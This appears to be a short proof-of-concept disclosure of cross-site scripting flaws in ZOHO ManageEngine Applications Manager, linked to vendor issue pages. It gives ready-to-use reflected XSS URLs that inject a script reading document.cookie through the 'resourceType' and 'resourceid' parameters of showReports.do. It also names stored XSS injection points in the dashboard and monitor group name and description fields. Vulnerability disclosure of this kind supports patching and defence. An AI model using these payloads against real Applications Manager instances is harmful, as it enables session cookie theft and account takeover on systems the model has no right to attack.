ZOHO Manage Engine Application Manager - XSS POC

https://@IP//showReports.do?actionMethod=generateGlanceReport&period=0&Report=true&resourceType=<script>alert(document.cookie)</script>

• https://www.manageengine.com/products/applications_manager/issues.html#v13980

This version of Application Manager is vulnerable to a stored XSS via the "name" field in the "New Dashboard" and "New Business Dashboards" creation screens that'll be reflected in the "title" of the dashboards.

https://@IP/MyPage.do?method=viewDashBoard

It's also vulnerable to a stored XSS reflected in the "showapplication" page via the "name" and "description" fields when creating/modifying a monitor group.

• https://www.manageengine.com/products/applications_manager/issues.html#v13980

The "resourceid" parameter is not santized and is reflecting any code being sent.

http://@IP/showReports.do?actionMethod=generateMttrAvailablityReport&resourceid=<script>alert(document.cookie)</script>&period=0&Report=true&resourceType=Monitors

• https://www.manageengine.com/products/applications_manager/issues.html#v13990